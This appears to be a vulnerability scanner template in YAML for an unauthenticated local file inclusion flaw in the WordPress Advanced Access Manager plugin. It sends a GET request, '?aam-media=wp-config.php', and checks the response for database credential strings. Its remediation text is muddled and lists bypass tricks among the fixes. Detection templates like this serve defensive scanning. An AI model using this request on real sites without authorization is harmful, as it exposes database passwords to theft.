id: advanced-access-manager-lfi
info:
  name: Advanced Access Manager < 5.9.9 - Unauthenticated Local File Inclusion
  author:
  - l0ne1y
  tags:
  - wordpress
  - wp-plugin
  - lfi
  description: |-
    Wordpress Plugin Advanced Access Manager < 5.9.9 - Unauthenticated Local File Inclusion Vulnerability
    The Advanced Access Manager WordPress plugin (versions prior to 5.9.9) allows reading of arbitrary files. This will download the wp-config.php file and access the database, which is publicly accessible on many servers.

    The affected function is the printMedia() function in the application/Core/Media.php file.
  reference:
  - https://wpscan.com/vulnerability/9873
  - https://id.wordpress.org/plugins/advanced-access-manager/
  severity: high
  remediation: |-
    Official fix:
    1. It is recommended that users go to the official website to obtain the latest patches or the latest version of the program: https://wordpress.com/zh-cn/install-plugins/

    Temporary fix:
    1. Use open_basedir configuration in PHP to restrict access to specified areas and truncate the path length.
    2. Filter. (dot)/(backslash)\\(backslash), encoding bypass
    3. Disable server remote file inclusion
    4. For the situation where the included file suffix is ​​restricted, the PHP version is less than 5.3, php.ini magic_quotes_gpc = off, and the addslashes function is not used for controllable parameters. If these three conditions are met, %00 truncation can be used.
    5. Question mark, pound sign, and space bypass (remote)
requests:
- matchers:
  - type: word
    condition: and
    part: body
    words:
    - DB_NAME
    - DB_PASSWORD
  - type: status
    status:
    - 200
  matchers-condition: and
  path:
  - '{{BaseURL}}/?aam-media=wp-config.php'
  method: GET
